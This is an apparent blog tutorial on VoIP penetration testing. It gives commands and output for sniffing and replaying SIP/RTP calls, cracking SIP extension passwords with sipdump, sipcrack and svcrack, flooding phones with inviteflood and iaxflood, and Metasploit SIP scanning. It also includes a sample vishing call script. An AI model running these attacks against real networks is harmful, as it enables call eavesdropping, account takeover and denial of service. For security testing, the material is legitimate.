VoIP Sniffing Cracking Phishing & Metasploit Testing Tutorial
We have discussed about the VoIP penetration testing and security risk and this is the second part of this series article/tutorial, VoIP and wireless security is an important field to discuss because the security risks are very high so below is the demonstration on VoIP hacking with different tools and operating system that has been used for the demonstration was Linux backtrack 5 r2.
Sniffing on VoIP Network
The concept of sniffing in VoIP network is the same as a general network sniffing concept. I will use some of the most famous tools to demonstrate the sniffing attack on VoIP network. Let us start with Wireshark, which is able to capture VoIP traffic.Now let’s suppose the end users (extensions) are busy communicating with each other, and that an attacker is trying to capture some traffic so that he/she will able to get the data (their communication).
Wireshark has captured some traffic. As discussed above on the protocol section, RTP contains the information. The question now is: how do we extract information from these packets? Wireshark provides the option to extract the information with a built-in feature for VoIP. Click on the telephony tab – VoIP calls you. You will then get this window:
Click on the player, then on the decode tab. You are now able to listen in to this communication and all of the data available in the audio file.
SIP Authentication Cracking (VoIP Cracking)
The importance of password is not a hidden truth, so in this section I will show you how to crack the password of any extension (user) on VoIP network. This attack is the most dangerous, because if an attacker know your password, then he/she will be able to authenticate on the network by using your identity.The Wireshark result can be used for authentication cracking. Save the result into name.pcap; we will now use a wonderful tool called SIPcrack. It contains two scripts: one, sipdump, which will allow you to dump the authentication data into hashes; the second, sipcrack, which will help you to crack the VoIP password.
01 02 03 04 05 06 07 08 09 10 11 12 13 | root@bt:~/Desktop/SIPcrack# ./sipdump pass.txt -p aa.pcap SIPdump 0.3pre ( MaJoMu | www.codito.de ) --------------------------------------- * Using pcap file 'aa.pcap' for sniffing * Starting to sniff with packet filter 'tcp or udp' * Dumped login from 192.168.1.9 -> 192.168.1.3 (User: '600') Exiting, sniffed 1 logins |
Sipcrack needs a wordlist to launch an attack. As a result, it will give you the password.
Another wonderful tool that will help you to crack the SIP password is svcrack. As with the others, it can be find under the tool suite of sipvicious. Svcrack is wonderful for brute force attacks on SIP accounts.
1 2 3 4 5 6 7 | root@bt:/pentest/voip/sipvicious# ./svcrack.py -u600 -d list.txt 192.168.1.9 | Extension | Password | ------------------------ | 600 | 12345 | |
Denial of Service Attack on VoIP Network
Denial of server (DOS) attack is a dangerous attack that can cause the VoIP network and devices to crash. Inviteflood is the tool used to launch DOS attacks against any extensions (user) on the VoIP network. Usage:
1 2 | ./inviteflood interface targetuser targetdomain floodtarget numberofpackets ./inviteflood eth0 600 192.168.1.3 192.168.1.3 200000 |
It seems to be a “ping of death” attack and it will crash the end user operating system, disabling the ability of he/she to make any calls.
Iaxflood is another a good tool that can flood the IAX2 protocol; the usage is very simple:
1 2 | root@bt:/pentest/voip/iaxflood# ./iaxflood usage: ./iaxflood sourcename destinationname numpackets |
A simple usage like:
01 02 03 04 05 06 07 08 09 10 11 | root@bt:/pentest/voip/iaxflood# ./iaxflood 192.168.1.13 192.168.1.2 10000 Will flood port 4569 from port 4569 10000 times We have IP_HDRINCL Number of Packets sent: Sent 10000 root@bt:/pentest/voip/iaxflood# |
Metasploit on VoIP Penetration Testing
Metasploit has a different auxiliary module for VoIP network. Here is the list of some best auxiliary modules of metasploit for VoIP hacking:- auxiliary/scanner/sip/options (To find the SIP enable devices)
- auxiliary/scanner/sip/enumerator (To enumerate the extensions)
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 | msf > use auxiliary/scanner/sip/options msf auxiliary(options) > set RHOSTS 192.168.1.1/24 RHOSTS => 192.168.1.1/24 msf auxiliary(options) > run [*] 192.168.1.3 sip:nobody@192.168.1.3 agent='WAcjCpW' [*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(options) > |
VoIP Phishing
Security awareness is very important. Before concluding this article, I just want to briefly discuss VoIP phishing. Phishing is not a new attack – it is pretty old school – but it remains a threat because hackers usually use some social engineering technique to trick a user before stealing his/her credential information. You might have heard about email phishing, in which an attacker directs the victim to a fake page, so that they will enter their confidential information. In the same fashion, a hacker can hijack your calls to get your credential information.Let’s suppose someone received a call or email like this:
“Hi, this is an urgent email (call) that has been generated by the network administrator. We have found something wrong with your account, so please call back at XXXX-XXXX-XXX to verify your account.” “Typically, an unwary user will call back; the hacker may then ask for some confidential information. You need to understand the risk; educate people around you.
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.